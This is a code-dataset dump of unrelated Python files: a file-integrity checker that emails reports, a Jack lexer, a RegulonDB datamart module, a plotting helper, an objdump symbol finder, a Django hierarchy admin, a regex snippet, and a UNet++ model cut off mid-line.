'MAIL_SUBJECT'\nTEXT = ''\nporcentajeBorrado=borrados*100.0/len(antiguo)\nporcentajeModificado=(len(diferencia)-nuevos-borrados*1.0)*100.0/len(antiguo)\nif(not len(diferencia) ==0):\n SUBJECT='ERROR: Integridad al '+str(100-(len(diferencia)+borrados)*100/len(antiguo))+'%. '+str(borrados)+' ARCHIVOS ELIMINADOS, '+str(len(diferencia)-nuevos-borrados)+' ARCHIVOS MODIFICADOS Y '+str(nuevos)+ ' ARCHIVOS NUEVOS'\n TEXT= TEXT+\"Numero de archivos eliminados: \"+str(borrados)+'\\r\\n'\n TEXT= TEXT+\"Numero de archivos nuevos que no deberian estar: \"+str(nuevos)+'\\r\\n'\n TEXT= TEXT+\"Numero de archivos modificados: \"+str(len(diferencia)-nuevos-borrados)+'\\r\\n'\n TEXT= TEXT+json.dumps(diferencia, sort_keys=True, indent=1)+'\\r\\n'\n TEXT= TEXT+\"Este es un correo automatico. No responda por favor\"\n\nelse:\n SUBJECT=\"Archivos integros\"\n TEXT='Los archivos continuan integros.'+'\\r\\n'\n TEXT= TEXT+\"Este es un correo automatico. No responda por favor\"\n\nTO = destination\n\n\n# Gmail Sign In\ngmail_sender = gmail_user\ngmail_passwd = gmail_passwd\n\nserver = smtplib.SMTP('smtp.gmail.com', 587)\nserver.ehlo()\nserver.starttls()\nserver.login(gmail_sender, gmail_passwd)\n\nBODY = '\\r\\n'.join(['To: %s' % TO,\n 'From: %s' % gmail_sender,\n 'Subject: %s' % SUBJECT,\n '', TEXT])\n\ntry:\n server.sendmail(gmail_sender, [TO], BODY)\n print ('email sent')\nexcept:\n print ('error sending mail')\n\nserver.quit()\n","repo_name":"gabboman/ssii_p1","sub_path":"integrityChecker.py","file_name":"integrityChecker.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27586101960","text":"from .token import Token\nfrom typing import Sequence, Mapping\nimport string\n\nSYMBOLS = {'{', '}', '(', ')', '[', ']', '.', ',', ';', '+', '-', '*', '/', '&', '|', '<', '>', '=', '~'}\nKEYWORDS = {'class', 'constructor', 'function', 'method', 'field', 'static', 'var', 'int', 'char',\n 'boolean', 'void', 'true', 'false', 'null', 'this', 'let', 'do', 'if', 'else', 'while', 'return'}\nWHITESPACES_CHARS = (' ', '\\t', '\\n')\nIDENTIFIER_ALLOWED_CHARS = string.ascii_letters + '_' + string.digits\n\n\nclass Lexer:\n _content: str\n _computed: Sequence\n _position: Mapping[str, int]\n\n def __init__(self, content: str):\n self._content = content\n self._computed = []\n self._position = {\n 'last_line': 0,\n 'last_column': 0,\n 'line': 0,\n 'column': 0\n }\n\n def _get_next_raw_char(self, peek: bool = False) -> str:\n \"\"\"Returns the next unparsed char without skipping comments\"\"\"\n # Check if we read beyond the file limits\n if not self._content:\n raise EndOfFileError(self.position)\n\n # Read next character\n result = self._content[0]\n if not peek:\n self._content = self._content[1:]\n\n # Update self._position\n if result == '\\n':\n self._position['line'] += 1\n self._position['column'] = 0\n else:\n self._position['column'] += 1\n\n # Return read char\n return result\n\n def _skip_whitespaces(self) -> None:\n \"\"\"Pops from queue all whitespaces characters\"\"\"\n while self._content and self._get_next_raw_char(peek=True) in WHITESPACES_CHARS:\n self._get_next_raw_char()\n\n def _skip_comments(self, whitespaces: bool = False):\n \"\"\"Skip comments if there are any before the next parsed token\"\"\"\n # Skip whitespaces if needed\n if whitespaces:\n self._skip_whitespaces()\n\n while self._content.startswith('//') or self._content.startswith('/*'):\n if self._content.startswith('//'):\n # Next char starts a line comment\n next_character = self._get_next_raw_char()\n while next_character != '\\n':\n next_character = self._get_next_raw_char()\n\n else:\n # Next char starts a multiline comment\n next_character = self._get_next_raw_char()\n while not (next_character == '*' and self._get_next_raw_char(peek=True) == '/'):\n next_character = self._get_next_raw_char()\n\n # Next character is '/' (after we poped '*'), pop it\n self._get_next_raw_char()\n\n # Skip whitespaces if needed\n if whitespaces:\n self._skip_whitespaces()\n\n def _skip(self, comments: bool = False, whitespaces: bool = False) -> None:\n if comments:\n self._skip_comments(whitespaces=whitespaces)\n elif whitespaces:\n self._skip_whitespaces()\n\n def _get_next_char(self, peek: bool = False) -> str:\n \"\"\"Returns the next unparsed char while skipping comments\"\"\"\n # Make sure that next char doesn't begin a new comment\n self._skip(comments=True)\n\n # Backup position if peek was asked\n backup_position = self.position\n\n # Read next char\n result = self._get_next_raw_char()\n\n # We can't modify self._content if the caller asked for peek, restore it to its original state\n if peek:\n # Push back the character\n self._position = backup_position\n self._content = result + self._content\n\n return result\n\n def _get_next_sequence(self, allowed_chars: str) -> str:\n \"\"\"Return the next maximum valid sequence that contains only allowed_chars\"\"\"\n result = ''\n # Check that there is a next_char, and that the next char is in allowed_chars\n while self._content and self._get_next_char(peek=True) in allowed_chars:\n result += self._get_next_char()\n return result\n\n def next(self) -> Token:\n \"\"\"Return the next maximum valid sequence that can be parsed as a token\"\"\"\n if self._computed:\n return self._computed.pop()\n\n # Update last position\n self._position['last_line'], self._position['last_column'] = self.line, self.column\n\n # Skip whitespaces and comments to backup a relevant token position\n self._skip(comments=True, whitespaces=True)\n token_position = self.position\n\n # Determine which token type is being parsed\n next_char = self._get_next_char()\n if next_char in string.digits:\n # Next token is a integerConstant\n full_expression = next_char + self._get_next_sequence(string.digits)\n return Token(full_expression, 'integerConstant', token_position)\n\n elif next_char in string.ascii_letters or next_char == '_':\n # Next token is an identifier or a keyword\n full_expression = next_char + self._get_next_sequence(IDENTIFIER_ALLOWED_CHARS)\n if full_expression in KEYWORDS:\n return Token(full_expression, 'keyword', token_position)\n else:\n return Token(full_expression, 'identifier', token_position)\n\n elif next_char == '\"':\n # Next token is a stringConstant\n full_expression = ''\n next_char = self._get_next_raw_char()\n while next_char != '\"':\n if next_char == '\\n':\n raise UnterminatedStringError(self.position)\n\n full_expression += next_char\n next_char = self._get_next_raw_char()\n\n return Token(full_expression, 'stringConstant', token_position)\n\n elif next_char in SYMBOLS:\n # Next token is a symbol\n return Token(next_char, 'symbol', token_position)\n\n else:\n # next_char cannot start any valid token\n raise UnexpectedCharacterError(next_char, token_position)\n\n def peek(self, count: int = 1) -> Token:\n \"\"\"Returns the next parsed token without fetching it from the token queue\"\"\"\n return_queue = []\n for i in range(count):\n next_token = self.next()\n return_queue.insert(0, next_token)\n\n self._computed += return_queue\n\n return next_token\n\n @property\n def position(self) -> Mapping[str, int]:\n \"\"\"Returns the current position\"\"\"\n return self._position.copy()\n\n @property\n def line(self) -> int:\n \"\"\"Return the current line\"\"\"\n return self._position[\"line\"]\n\n @property\n def column(self) -> int:\n \"\"\"Return the current column\"\"\"\n return self._position[\"column\"]\n\n @property\n def finished(self) -> bool:\n \"\"\"Returns whether we finished parsing all code, or there are more tokens to parse.\"\"\"\n self._skip(comments=True, whitespaces=True)\n return self._content == ''\n\n\nclass TokenParseError(Exception):\n def __init__(self, description: str, line: int, column: int):\n super().__init__(f'Parse error at line {line}, column {column}: {description}')\n\n\nclass EndOfFileError(TokenParseError):\n def __init__(self, position: Mapping[str, int]):\n super().__init__(\"End Of File reached\", position['line'], position['column'])\n\n\nclass UnterminatedStringError(TokenParseError):\n def __init__(self, position: Mapping[str, int]):\n super().__init__('Unterminated string', position['last_line'], position['last_column'])\n\n\nclass TokenTypeError(TokenParseError):\n def __init__(self, expected: str, got: str, position: Mapping[str, int]):\n super().__init__(f\"Expected {expected} and got \\\"{got}\\\"\", position['line'], position['column'])\n\n\nclass TokenValueError(TokenParseError):\n def __init__(self, expected: str, got: str, position: Mapping[str, int]):\n super().__init__(f\"Expected \\\"{expected}\\\" and got \\\"{got}\\\"\", position['last_line'], position['last_column'])\n\n\nclass UnexpectedCharacterError(TokenParseError):\n def __init__(self, char: str, position: Mapping[str, int]):\n super().__init__(f\"Unxpected character: {repr(char)}\", position['line'], position['column'])\n","repo_name":"omritamam/JackCompiler","sub_path":"lexer/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74077281449","text":"import multigenomic_api\nfrom src.datamarts.domain.general.biological_base import BiologicalBase\nfrom src.datamarts.domain.general.additiveEvidences import AdditiveEvidences\n\n\nclass RegulatoryInteractions(BiologicalBase):\n def __init__(self, reg_interaction):\n super().__init__([], reg_interaction.citations, \"\")\n self.active_conformation = reg_interaction.regulator\n self.regulatory_interaction = reg_interaction\n self.regulated_entity = reg_interaction.regulated_entity\n self.regulated_genes = reg_interaction.regulated_entity\n self.regulatory_binding_sites = reg_interaction\n\n def to_dict(self):\n reg_genes = self.regulated_genes\n citations = self.citations\n reg_bind_sites = self.regulatory_binding_sites\n additive_evs = AdditiveEvidences(citations + reg_bind_sites.get(\"citations\", []))\n regulatory_interactions = {\n \"_id\": self.regulatory_interaction.id,\n \"function\": self.regulatory_interaction.function,\n \"regulatedEntity\": self.regulated_entity,\n \"activeConformation\": self.active_conformation,\n \"distanceToFirstGene\": get_distance_to_first_gene(self.regulatory_interaction, reg_genes),\n \"distanceToPromoter\": self.regulatory_interaction.dist_site_promoter,\n \"regulatedGenes\": self.regulated_genes,\n \"regulatoryBindingSites\": reg_bind_sites,\n \"citations\": citations,\n # TODO: Check if this field is correctly obtained\n \"mechanism\": self.regulatory_interaction.mechanism,\n \"additiveEvidences\": additive_evs.to_dict(),\n \"confidenceLevel\": additive_evs.get_confidence_level()\n }\n return regulatory_interactions\n\n @property\n def active_conformation(self):\n return self._active_conformation\n\n @active_conformation.setter\n def active_conformation(self, regulator):\n name = regulator.name\n if regulator.type == \"regulatoryComplex\":\n reg = multigenomic_api.regulatory_complexes.find_by_id(regulator.id)\n if reg.abbreviated_name:\n name = reg.abbreviated_name\n else:\n tf = multigenomic_api.transcription_factors.find_by_name(regulator.name)\n if tf:\n name = tf.abbreviated_name\n elif regulator.type == \"product\":\n reg = multigenomic_api.products.find_by_id(regulator.id)\n if reg.abbreviated_name:\n name = reg.abbreviated_name\n self._active_conformation = {\n \"_id\": regulator.id,\n \"type\": regulator.type,\n \"name\": name\n }\n\n @property\n def regulated_entity(self):\n return self._regulated_entity\n\n @regulated_entity.setter\n def regulated_entity(self, regulated_entity):\n self._regulated_entity = {\n \"_id\": regulated_entity.id,\n \"type\": regulated_entity.type,\n \"name\": regulated_entity.name\n }\n\n @property\n def regulated_genes(self):\n return self._regulated_genes\n\n @regulated_genes.setter\n def regulated_genes(self, regulated_entity):\n self._regulated_genes = []\n transcription_units = []\n if regulated_entity.type == \"gene\":\n self._regulated_genes.append({\n \"_id\": regulated_entity.id,\n \"name\": regulated_entity.name,\n })\n elif regulated_entity.type == \"promoter\":\n transcription_units = multigenomic_api.transcription_units.find_by_promoter_id(regulated_entity.id)\n elif regulated_entity.type == \"transcriptionUnit\":\n trans_unit = multigenomic_api.transcription_units.find_by_id(regulated_entity.id)\n transcription_units.append(trans_unit)\n if transcription_units:\n for tu in transcription_units:\n for gene_id in tu.genes_ids:\n gene = multigenomic_api.genes.find_by_id(gene_id)\n gene_object = {\n \"_id\": gene.id,\n \"name\": gene.name,\n }\n if gene_object not in self._regulated_genes:\n self._regulated_genes.append(gene_object)\n\n @property\n def regulatory_binding_sites(self):\n return self._regulatory_binding_sites\n\n @regulatory_binding_sites.setter\n def regulatory_binding_sites(self, reg_interaction):\n self._regulatory_binding_sites = {}\n strand = \"\"\n if reg_interaction.regulatory_sites_id:\n if reg_interaction.regulated_entity.type == \"promoter\":\n promoter = multigenomic_api.promoters.find_by_id(reg_interaction.regulated_entity.id)\n strand = promoter.strand\n elif reg_interaction.regulated_entity.type == \"transcriptionUnit\":\n trans_unit = multigenomic_api.transcription_units.find_by_id(reg_interaction.regulated_entity.id)\n if trans_unit.promoters_id:\n promoter = multigenomic_api.promoters.find_by_id(trans_unit.promoters_id)\n strand = promoter.strand\n elif reg_interaction.regulated_entity.type == \"gene\":\n gene = multigenomic_api.genes.find_by_id(reg_interaction.regulated_entity.id)\n strand = gene.strand\n regulatory_sites = multigenomic_api.regulatory_sites.find_by_id(reg_interaction.regulatory_sites_id)\n reg_binding_sites_obj = RegulatoryBindingSites(regulatory_sites).to_dict()\n if strand == \"reverse\":\n reg_binding_sites_obj[\"sequence\"] = reverse_complement(reg_binding_sites_obj[\"sequence\"])\n reg_binding_sites_obj[\"strand\"] = strand\n self._regulatory_binding_sites = reg_binding_sites_obj\n\n\ndef get_distance_to_first_gene(reg_int, regulated_genes):\n strand = None\n first_gene = None\n if reg_int.regulatory_sites_id:\n reg_sites = multigenomic_api.regulatory_sites.find_by_id(reg_int.regulatory_sites_id)\n if reg_int.regulated_entity.type == \"gene\":\n first_gene = multigenomic_api.genes.find_by_id(reg_int.regulated_entity.id)\n if first_gene.strand:\n strand = first_gene.strand\n else:\n if reg_int.regulated_entity.type == \"promoter\":\n promoter = multigenomic_api.promoters.find_by_id(reg_int.regulated_entity.id)\n strand = promoter.strand\n first_gene = get_first_gene_of_tu(regulated_genes, strand)\n elif reg_int.regulated_entity.type == \"transcriptionUnit\":\n trans_unit = multigenomic_api.transcription_units.find_by_id(reg_int.regulated_entity.id)\n operon = multigenomic_api.operons.find_by_id(trans_unit.operons_id)\n strand = operon.strand\n first_gene = get_first_gene_of_tu(regulated_genes, strand)\n if reg_sites.absolute_position:\n if first_gene:\n if strand == \"forward\":\n return reg_sites.absolute_position - first_gene[\"left_end_position\"]\n else:\n return first_gene[\"right_end_position\"] - reg_sites.absolute_position\n elif reg_sites.left_end_position and reg_sites.right_end_position:\n abs_pos = (reg_sites.right_end_position - reg_sites.left_end_position)/2 + reg_sites.left_end_position\n if first_gene:\n if strand == \"forward\":\n return abs_pos - first_gene[\"left_end_position\"]\n else:\n return first_gene[\"right_end_position\"] - abs_pos\n return None\n\n\nclass RegulatoryBindingSites(BiologicalBase):\n def __init__(self, reg_sites):\n super().__init__(reg_sites.external_cross_references, reg_sites.citations, reg_sites.note)\n self.reg_sites = reg_sites\n\n def to_dict(self):\n regulatory_binding_sites = {\n \"_id\": self.reg_sites.id,\n \"absolutePosition\": self.reg_sites.absolute_position,\n \"leftEndPosition\": self.reg_sites.left_end_position,\n \"rightEndPosition\": self.reg_sites.right_end_position,\n \"sequence\": self.reg_sites.sequence,\n \"strand\": self.reg_sites.strand,\n \"citations\": self.citations\n }\n return regulatory_binding_sites\n\n\ndef reverse_complement(sequence=None):\n if sequence:\n alt_map = {'ins': '0'}\n complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'a': 't', 'c': 'g', 'g': 'c', 't': 'a'}\n for k, v in alt_map.items():\n sequence = sequence.replace(k, v)\n bases = list(sequence)\n bases = reversed([complement.get(base, base) for base in bases])\n bases = ''.join(bases)\n for k, v in alt_map.items():\n bases = bases.replace(v, k)\n return bases\n\n\ndef get_first_gene_of_tu(genes, strand):\n dict_genes = []\n first_gene = None\n for gene in genes:\n gene_object = multigenomic_api.genes.find_by_id(gene.get(\"_id\"))\n if gene_object.fragments:\n min_left_pos = min(gene_object.fragments, key=lambda x: x.left_end_position)\n max_right_pos = max(gene_object.fragments, key=lambda x: x.right_end_position)\n gene_object.left_end_position = min_left_pos.left_end_position\n gene_object.right_end_position = max_right_pos.right_end_position\n dict_genes.append({\n \"id\": gene_object.id,\n \"name\": gene_object.name,\n \"left_end_position\": gene_object.left_end_position,\n \"right_end_position\": gene_object.right_end_position\n })\n if len(dict_genes) > 0:\n if strand == \"forward\":\n first_gene = (min(dict_genes, key=lambda x: x[\"left_end_position\"]))\n elif strand == \"reverse\":\n first_gene = (max(dict_genes, key=lambda x: x[\"right_end_position\"]))\n return first_gene\n","repo_name":"regulondbunam/RegulonDB-Datamarts","sub_path":"src/datamarts/domain/regulon_datamart/regulatory_interactions.py","file_name":"regulatory_interactions.py","file_ext":"py","file_size_in_byte":9963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328579368","text":"import matplotlib.pyplot as plt\n\n\ndef draw_loss_accuracy_plot(curves: dict) -> None:\n \"\"\" The function creates a plot of 4 curves and displays it\"\"\"\n colors = \"bgrcmyk\"\n color_index = 0\n epochs = range(1, len(next(iter(curves.values()))) + 1)\n\n for label, value in curves.items():\n plt.plot(epochs, value, c=colors[color_index], label=label)\n color_index += 1\n\n plt.xticks(epochs)\n plt.legend(bbox_to_anchor=(1.05, 1), loc='upper left', borderaxespad=0.)\n plt.show()\n","repo_name":"knodle/knodle","sub_path":"knodle/evaluation/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"2815048722","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nfrom subprocess import Popen, PIPE\n\ndef print_usage():\n print(\"Usage: {0} SYMBOL LIBRARY [LIBRARY]...\".format(sys.argv[0]))\n\ndef print_symbols(searchSymbol, searchLibraries):\n cmd = [\"objdump\", \"-CT\"] + searchLibraries\n p = Popen(cmd, stdout=PIPE)\n stdout = p.communicate()[0].rstrip()\n\n # parse\n lastFile = \"\"\n for line in stdout.splitlines():\n if \"file format\" in line:\n fileName = line.split(\":\")[0]\n lastFile = fileName\n continue\n\n if \".text\" in line:\n # filter the symbol from the objdump line\n words = line.split(\" \")\n startIndexOfSymbol = len(words) - words[::-1].index(\"\")\n symbol = \" \".join(words[startIndexOfSymbol:])\n\n # we're only interested in the part before '('\n if searchSymbol in symbol.split(\"(\")[0]:\n print(\"{0}: {1}\".format(lastFile, symbol))\n\nif __name__ == \"__main__\":\n if len(sys.argv) <= 2:\n print_usage()\n sys.exit(1)\n\n searchSymbol = sys.argv[1]\n searchLibraries = sys.argv[2:]\n\n # call\n print_symbols(searchSymbol, searchLibraries)\n sys.exit(0)\n","repo_name":"krf/dotfiles","sub_path":"bin/find_symbol.py","file_name":"find_symbol.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"19904110255","text":"\"\"\"\nhierahy admin\n\"\"\"\nimport os\nimport json\nfrom django.forms import BooleanField\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.contrib.admin.views.main import ChangeList, ERROR_FLAG\nfrom django.contrib.admin import helpers\nfrom django.core.exceptions import PermissionDenied\nfrom django.contrib import admin\nfrom django.utils.translation import ugettext as _\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.utils.encoding import force_text\nfrom django.conf import settings\nfrom django import template\nfrom django.utils.safestring import mark_safe\nfrom django import VERSION as DjangoVersion\nfrom django.template.response import SimpleTemplateResponse\n\nfrom elements.forms import dynamicforms\nfrom elements.settings import HIERARHY_STATIC_URL, CSS_PATH\n\n\nif DjangoVersion[:2] >= (1, 5):\n DJANGO_VERSION = 15\nelse:\n DJANGO_VERSION = \"%d%d\" % (DjangoVersion[:2][0], DjangoVersion[:2][1])\n\ncsrf_protect_m = method_decorator(csrf_protect)\n\n\nclass IncorrectLookupParameters(Exception):\n \"\"\"\n Exseption\n \"\"\"\n pass\n\n\nclass NavigationForm(dynamicforms.Form):\n \"\"\"\n nav form\n \"\"\"\n\n status = BooleanField(required=False)\n\n\nclass MyChangeList(ChangeList):\n \"\"\"\n change list\n \"\"\"\n def get_queryset(self, request, root=True):\n \"\"\"\n override get queryset\n \"\"\"\n if root:\n self.params['parent'] = None\n else:\n self.params = {}\n qus = super(MyChangeList, self).get_queryset(request)\n return qus\n\n\nclass HierarhyModelAdmin(admin.ModelAdmin):\n \"\"\"\n hierahy model admin\n \"\"\"\n\n class Media:\n \"\"\"\n model media\n \"\"\"\n\n if settings.DEBUG:\n CSS_PATH = '%s/src' % CSS_PATH\n\n css = {\n 'all': [os.path.join(HIERARHY_STATIC_URL, CSS_PATH, path)\n for path in (\n 'navigation.css',\n )]\n }\n\n def process_item(self, item, form):\n \"\"\"\n process item\n \"\"\"\n pass\n\n def save_changed(self, request, queryset):\n \"\"\"\n save changes\n \"\"\"\n def id(name):\n \"\"\"\n ID\n \"\"\"\n return int(name.split('-')[-1])\n\n def realign(items, data, parent=None, position=1):\n \"\"\"\n realign\n \"\"\"\n for dat in data:\n item = items[id(dat['id'])]\n item.invalidate()\n item.position = position\n item.parent = parent\n position += 1\n item.save()\n realign(items, dat['children'], item, position)\n\n try:\n path = request.META['HTTP_REFERER']\n except ValueError:\n path = '.'\n\n if request.method == 'POST':\n items = dict(\n [(item.id, item) for item in self.model.objects.all()])\n redata = request.POST.get('navigation')\n hierarchy_data = json.loads(redata)\n realign(items, hierarchy_data)\n for form in NavigationForm.get_forms(request):\n assert form.is_valid()\n try:\n item = items[int(form.id)]\n self.process_item(item, form)\n except KeyError:\n pass # Should we fail silently?\n\n [entry.save() for entry in items.values()]\n\n self.message_user(\n request, _('The navigation was updated successfully. '\n 'You may edit it again below.'))\n\n return HttpResponseRedirect(path)\n\n save_changed.short_description = \"%s\" % _(\"Save selected changes\")\n ordering = [\"position\"]\n item_template = 'admin/nav_item.html'\n\n @csrf_protect_m\n def changelist_view(self, request, extra_context=None):\n \"\"\"\n changelist_view\n \"\"\"\n # super(HierarhyModelAdmin, self).changelist_view(request)\n media = self.media\n\n opts = self.model._meta\n app_label = opts.app_label\n if not self.has_change_permission(request, None):\n raise PermissionDenied\n\n # Check actions to see if any are available on this changelist\n actions = self.get_actions(request)\n list_display = list(self.list_display)\n self.list_editable = list(self.list_editable)\n self.list_filter = list(self.list_filter)\n\n # Remove action checkboxes if there aren't any actions available.\n if not actions:\n try:\n list_display.remove('action_checkbox')\n except ValueError:\n pass\n\n try:\n list_display_links = self.get_list_display_links(request,\n list_display)\n except AttributeError:\n list_display_links = []\n\n if self.list_max_show_all:\n list_max_show_all = self.list_max_show_all\n else:\n list_max_show_all = []\n\n try:\n if int(DJANGO_VERSION) > 13:\n cli = MyChangeList(request, self.model, list_display,\n list_display_links, self.list_filter,\n self.date_hierarchy, self.search_fields,\n self.list_select_related,\n self.list_per_page, list_max_show_all,\n self.list_editable, self)\n else:\n cli = MyChangeList(request, self.model, list_display,\n self.list_display_links, self.list_filter,\n self.date_hierarchy, self.search_fields,\n self.list_select_related,\n self.list_per_page, self.list_editable,\n self)\n except IncorrectLookupParameters:\n # Wacky lookup parameters were given, so redirect to the main\n # changelist page, without parameters, and pass an 'invalid=1'\n # parameter via the query string. If wacky parameters were given\n # and the 'invalid=1' parameter was already in the query string,\n # something is screwed up with the database, so display an error\n # page.\n if ERROR_FLAG in request.GET.keys():\n return SimpleTemplateResponse('admin/invalid_setup.html', {\n 'title': _('Database error'),\n })\n return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1')\n\n # If the request was POSTed, this might be a bulk action or a bulk\n # edit. Try to look up an action or confirmation first, but if this\n # isn't an action the POST will fall through to the bulk edit check,\n # below.\n\n selected = request.POST.getlist(helpers.ACTION_CHECKBOX_NAME)\n # Actions with no confirmation\n if (actions and request.method == 'POST' and\n 'index' in request.POST and '_save' not in request.POST):\n if selected:\n response = self.response_action(\n request,\n queryset=cli.get_queryset(request, False))\n if response:\n return response\n\n else:\n msg = _(\"Items must be selected in order to perform \"\n \"actions on them. No items have been changed.\")\n self.message_user(request, msg)\n\n # Actions with confirmation\n if (actions and request.method == 'POST' and\n helpers.ACTION_CHECKBOX_NAME in request.POST and\n 'index' not in request.POST and '_save' not in request.POST):\n if selected:\n response = \\\n self.response_action(request,\n queryset=cli.get_query_set(request,\n False))\n if response:\n return response\n\n # If we're allowing changelist editing, we need to construct a formset\n # for the changelist given all the fields to be edited. Then we'll\n # use the formset to validate/process POSTed data.\n formset = cli.formset = None\n\n # Build the list of media to be used by the formset.\n if formset:\n media = self.media + formset.media\n else:\n media = self.media\n\n # Build the action form and populate it with available actions.\n if actions:\n action_form = self.action_form(auto_id=None)\n action_form.fields['action'].choices = \\\n self.get_action_choices(request)\n else:\n action_form = None\n\n media.add_js((\n HIERARHY_STATIC_URL + \"js/mootools.js\",\n HIERARHY_STATIC_URL + \"js/nested.min.js\",\n HIERARHY_STATIC_URL + \"js/navigation.min.js\",\n ))\n\n context = {\n 'module_name': force_text(opts.verbose_name_plural),\n 'title': _('Edit') + ' ' + _(opts.verbose_name_plural),\n 'is_popup': cli.is_popup,\n 'error': None,\n 'cl': cli,\n 'item_template': self.item_template,\n 'media': mark_safe(media),\n 'opts': opts,\n 'has_add_permission': self.has_add_permission(request),\n 'app_label': app_label,\n 'action_form': action_form,\n 'actions_on_top': self.actions_on_top,\n 'actions_on_bottom': self.actions_on_bottom,\n 'actions_selection_counter': self.actions_selection_counter,\n 'django_version': DJANGO_VERSION,\n }\n context.update(extra_context or {})\n context_instance = \\\n template.RequestContext(request, current_app=self.admin_site.name)\n return render_to_response('admin/navigation_list.html',\n context, context_instance)\n\n def __call__(self, request, url):\n \"\"\"\n call\n \"\"\"\n if url is None:\n return self.changelist_view(request)\n return super(HierarhyModelAdmin, self).__call__(request, url)\n\n def save_model(self, request, obj, form, change):\n \"\"\"\n save model\n \"\"\"\n target = request.GET.get('target', None)\n position = request.GET.get('position', None)\n\n if target is not None and position is not None:\n try:\n target = self.model.objects.get(pk=target)\n except self.model.DoesNotExist:\n pass\n else:\n target.invalidate()\n obj.move_to(target, position)\n\n super(HierarhyModelAdmin, self).save_model(request, obj, form, change)\n","repo_name":"yoza/base-elements","sub_path":"elements/admin/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":10921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42344289372","text":"import re\n\n\"\"\"\nmust start with character\n\n\"\"\"\npattern_str = r'^[a-z]\\w*@[a-z]\\w*\\.[a-z]{3}'\npattern = re.compile(pattern_str)\nstr = 'hello@example.com'\nstr1 = 'hello@3example.com'\nprint(re.match(pattern=pattern,string=str1))","repo_name":"mbaddar1/coding_exercises","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23725796009","text":"import torch\nimport torch.nn as nn\nfrom .unet_parts import *\nfrom unet.layers import *\nfrom unet.util import count_param\n\nclass UNetNested(nn.Module):\n def __init__(self, in_channels=3, n_classes=2, feature_scale=2, is_deconv=True, is_ds=True, sync_bn=False):\n super(UNetNested, self).__init__()\n self.in_channels = in_channels\n self.feature_scale = feature_scale\n self.is_deconv = is_deconv \n self.is_ds = is_ds\n self.batchnorm = nn.BatchNorm2d\n\n filters = [128, 256, 512, 1024]\n filters = [int(i / self.feature_scale) for i in filters]\n\n #downsampling\n self.maxpool = nn.MaxPool2d(kernel_size=2)\n self.conv00 = UnetConv2(self.in_channels, 32, self.batchnorm)\n self.conv10 = UnetConv2(32, 64, self.batchnorm)\n self.conv20 = UnetConv2(64, 128, self.batchnorm)\n self.conv30 = UnetConv2(128, 256, self.batchnorm)\n self.conv40 = UnetConv2(256, 512, self.batchnorm)\n\n # upsampling\n self.up_concat01 = UnetUp(64, 32, self.is_deconv)\n self.up_concat11 = UnetUp(128, 64, self.is_deconv)\n self.up_concat21 = UnetUp(256, 128, self.is_deconv)\n self.up_concat31 = UnetUp(512, 256, self.is_deconv)\n\n self.up_concat02 = UnetUp(64, 32, self.is_deconv, 3)\n self.up_concat12 = UnetUp(128, 64, self.is_deconv, 3)\n self.up_concat22 = UnetUp(256, 128, self.is_deconv, 3)\n\n self.up_concat03 = UnetUp(64, 32, self.is_deconv, 4)\n self.up_concat13 = UnetUp(128, 64, self.is_deconv, 4)\n\n self.up_concat04 = UnetUp(64, 32 , self.is_deconv, 5)\n\n self.final_1 = nn.Conv2d(32, 2, 1)\n self.final_2 = nn.Conv2d(32, 2, 1)\n self.final_3 = nn.Conv2d(32, 2, 1)\n self.final_4 = nn.Conv2d(32, 2, 1)\n\n self.__init_weight()\n\n def forward(self, inputs):\n \n x_00 = self.conv00(inputs)\n maxpool0 = self.maxpool(x_00)\n x_10 = self.conv10(maxpool0)\n maxpool1 = self.maxpool(x_10)\n x_20 = self.conv20(maxpool1)\n maxpool2 = self.maxpool(x_20)\n x_30 = self.conv30(maxpool2)\n maxpool3 = self.maxpool(x_30)\n x_40 = self.conv40(maxpool3)\n\n # column:1\n x_01 = self.up_concat01(x_10, x_00)\n x_11 = self.up_concat11(x_20, x_10)\n x_21 = self.up_concat21(x_30, x_20)\n x_31 = self.up_concat31(x_40, x_30)\n\n #column:2\n x_02 = self.up_concat02(x_11, x_00, x_01)\n x_12 = self.up_concat12(x_21, x_10, x_11)\n x_22 = self.up_concat22(x_31, x_20, x_21)\n\n # column:3\n x_03 = self.up_concat03(x_12, x_00, x_01, x_02)\n x_13 = self.up_concat13(x_22, x_10, x_11, x_12)\n\n # column:4\n x_04 = self.up_concat04(x_13, x_00, x_01, x_02, x_03)\n\n\n final_1 = self.final_1(x_01)\n final_2 = self.final_2(x_02)\n final_3 = self.final_3(x_03)\n final_4 = self.final_4(x_04)\n\n final = (final_1+final_2+final_3+final_4) / 4 \n\n if self.is_ds:\n return final\n else:\n return final_4\n\n\n def __init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.UpsamplingBilinear2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n \n\nif __name__ == \"__main__\":\n model = 